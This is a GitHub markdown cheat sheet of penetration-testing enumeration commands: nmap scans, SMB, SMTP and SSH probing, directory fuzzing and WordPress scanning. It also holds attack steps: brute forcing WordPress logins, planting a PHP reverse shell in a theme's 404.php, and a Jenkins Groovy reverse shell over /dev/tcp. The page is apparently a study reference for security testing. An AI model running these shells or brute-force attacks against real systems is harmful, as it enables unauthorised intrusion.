Skip to content

Latest commit

 

History

History
298 lines (250 loc) · 6.23 KB

enumeration.md

File metadata and controls

298 lines (250 loc) · 6.23 KB

Enumeration

Host Discovery

Nmap no ping top 50

sudo nmap --top-ports 50 <RANGE> --open -Pn -oA nmap_tcp_top50_hostdicovery
cat nmap_tcp_top50_hostdicovery | grep open | awk -f '{print $2}' | sort u > hosts.txt

NMap ping sweep

sudo nmap -sn <RANGE> -oA nmap_tcp_pingsweep

Netdiscover

sudo netdiscover -r <RANGE>
sudo netdisover -i <INTERFACE>

Arpscan

arp-scan -l

Services

Most common ports

21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy

Port scanning Nmap

Full TCP port scan

sudo nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET> 

Full UDP port scan

sudo nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET> 

Usefull flags

  • -Pn No ping #Use if host says down but you know its up)
  • -sn No port scan #Use for ping sweep

HTTP Openproxy

If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.

Autorecon

autorecon -vv <IP>

Vulnerability scanning

Nmap scan for vulnerabilities

nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET> 

SMTP

Enumerate emails accounts

nc -nv <IP> 25
VRFY root
VRFY idontexist
nmap -p25 --script smtp-enum-users <IP>

Enum smtp commands

nmap -p25 --script smtp-commands <IP>

nmap all smtp script

nmap -p25 --script *smtp* <IP>

Sendmail

sendEmail -t <VICTIM MAIL> -f <SENDER MAIL> -s <MAILSERVER IP> -u <TITLE OF MAIL> -a <ATTACHED FILE PATH>

SMB

Get version script

sudo python3 smbver.py <IP> <PORT>

Nmap enumerate SMB shares

nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>

Enum4linux

enum4linux <IP>

List shares and check access with null sessions

crackmapexec smb -u '' -p '' --shares

List shares and check access with username and password

  • use -d <DOMAIN> if the account is a domain account
crackmapexec smb -u '<USERNAME>' -p '<PASSWORD>' -d . 

SMBClient list shares

  • If username and password fill in the ""%"" part
smbclient -L <IP> -U ""%""

SMBClient connect to share

  • If username and password fill in the ""%"" part
smbclient //<IP>/<SHARE> -U ""%""

Download smb files recursively

get <FILE NAME>-
smbget -R smb://<IP>/<SHARE>

Nbtscan

nbtscan <IP>

RPC

Nmap enumerate RPC shares

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>

SSH

Connect with other algoritms

ssh <IP>
ssh <IP> -oKexAlgorithms=+<alg from error>
ssh <IP> -oKexAlgorithms=+<alg from error> -c <cipher from error>

Web-applications

  • Check the file extensions in URL’s to see what the application is running (.net .aspx .php etc)
  • Inspect page content
  • Check Firefox debugger for outdated javascript libraries
  • Look for /robots.txt and /sitemap.xml

HTTPS

  • If the webserver is running https, check the certificate for a url/hostname and add it to /etc/hosts

Find subdomains

curl <WEBPAGE>
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt

Screenshot a lot of http pages

Collect screenshot from list of ips

for ip in $(cat <IP FILE>); do cutycapt --url=$ip --out=$ip.png;done

Run the following bash script

#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> w
eb.html
echo "</BODY></HTML>" >> web.html

eyewitness

./EyeWitness -f urls.txt --web

Vulnerability scanning

Nikto

nikto -host <URL> -output nikto-URL.txt

Directory fuzzing

Dirb Quick scan

  • -R to disable recursive scanning
  • -p set up a proxy IP:PORT
  • -X Append each word with this extensions.
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt

Dirb Big wordlist

dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt

Gobuster Quick scan

  • use the -b flag to blacklist status codes.
  • Use the -x flag to add file extensions.
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> gobuster-<URL>.txt

Gobuster Big wordlist

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> gobuster-<URL>.txt

Wordpress

Scan Wordpress

wpscan -url <URL>

Enumerate users

wpscan –url <URL> -–enumerate u

Bruteforce login

wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50

Upload a reveare shell

  1. Login --> Appearance --> Theme editor --> 404.php
  2. gedit /usr/share/webshells/php/php-reverse-shell.php
  3. Paste in 404.php
  4. Start listener and go to an unexisting page in the browser

Jenkings

Execute commands

  • After login go to /script

Reverse java shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

General

Find dangerous HTTP methods

https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945

curl -v -X OPTIONS http://website/directory
#HTTP options such as PUT, Delete are bad